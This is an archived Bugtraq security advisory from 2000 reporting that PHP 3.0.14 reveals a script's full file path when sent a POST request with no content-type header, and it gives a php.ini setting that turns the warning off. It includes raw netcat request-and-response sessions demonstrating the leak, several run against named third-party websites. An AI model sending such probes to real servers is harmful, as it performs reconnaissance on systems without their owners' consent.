[LWN Logo]
[Timeline]
Date:         Thu, 15 Jun 2000 17:21:59 -0500
From: H D Moore <hdm@SECUREAUSTIN.COM>
Subject:      PHP 3.0.14 Disclosure via POST requests
To: BUGTRAQ@SECURITYFOCUS.COM

Hi,

I noticed some not-so-good behavior in PHP 3.0.14 when dealing with POST
requests that do not contain a content-type header in the request
(illegal).  The server will return the page anyways, but the first line
will be a PHP warning message containing the full path to that file.
The PHP developers have _not_ been notified because the bug (?) only
appears in older versions of thier software (4.0 has been released) and
the fact that path disclosure is a weak vulnerability by itself.  The
only reason I bothered posting this is becase of the inordinate amount
of interest on Bugtraq about NT's IIS giving away the pathnames to
scripts.  Disabling PHP's warning messages can be done by changing the
line in php.ini reading:

display_errors  =       On      ; Print out errors (as a part of the
HTML script)

to:

display_errors  =       Off      ; Print out errors (as a part of the
HTML script)

and restarting the webserver.

-HD

http://www.secureaustin.com
http://www.digitaldefense.net



Below are the results of my testing:

---[ PHP 3.0.14

hdm@atrophy:/var/www/htdocs/secureaustin > netcat www.secureaustin.com
80
POST /index.php3 HTTP/1.0
Host: www.secureaustin.com

HTTP/1.1 200 OK
Date: Thu, 15 Jun 2000 22:06:13 GMT
Server: Apache/1.3.11 (Unix) PHP/3.0.14 mod_ssl/2.5.0 OpenSSL/0.9.4
X-Powered-By: PHP/3.0.14
Connection: close
Content-Type: text/html

<br>
<b>Warning</b>:  POST Error: content-type missing in
<b>/home/www/htdocs/secureaustin/index.php3</b> on line <b>1

---[ PHP 3.0.9

hdm@atrophy:/var/www/htdocs/secureaustin > netcat
www.worldcupadvisor.com 80
POST /Main_Menu/body_main_menu.php3 HTTP/1.0
Host: www.worldcupadvisor.com

HTTP/1.1 200 OK
Date: Thu, 15 Jun 2000 22:01:40 GMT
Server: Apache/1.3.3 (Unix) PHP/3.0.9 FrontPage/3.0.4.3
Connection: close
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML>
<HEAD>
[ snip ]

hdm@atrophy:/var/www/htdocs/secureaustin >


---[ PHP 4.0B2

hdm@atrophy:/var/www/htdocs/secureaustin > netcat www.stonekeep.com
80
POST /ksonline/visitor.php3 HTTP/1.0
Host: www.stonekeep.com

HTTP/1.1 200 OK
Date: Thu, 15 Jun 2000 21:57:11 GMT
Server: Apache/1.3.9 (Unix) PHP/4.0B2
Connection: close
Content-Type: text/html

<br>
<b>Fatal error</b>:  No content-type in POST request in <b>[no active
file]</b> on line <b>0</b><br>
hdm@atrophy:/var/www/htdocs/secureaustin >

---[ PHP 4.0

hdm@atrophy:/var/www/htdocs/secureaustin > netcat www.freshmeat.net 80
POST / HTTP/1.0
Host: www.freshmeat.net

HTTP/1.1 200 OK
Date: Thu, 15 Jun 2000 21:48:59 GMT
Server: Apache/1.3.12 (Unix) PHP/4.0.0
Connection: close
Content-Type: text/html

<br>
<b>Fatal error</b>:  No content-type in POST request in <b>Unknown</b>
on line <b>0</b><br>
hdm@atrophy:/var/www/htdocs/secureaustin >

---[ PHP 4.0.1-dev

hdm@atrophy:/var/www/htdocs/secureaustin > netcat www.php.net 80
POST /quickref.php HTTP/1.0
Host: www.php.net

hdm@atrophy:/var/www/htdocs/secureaustin >


^-- just disconnects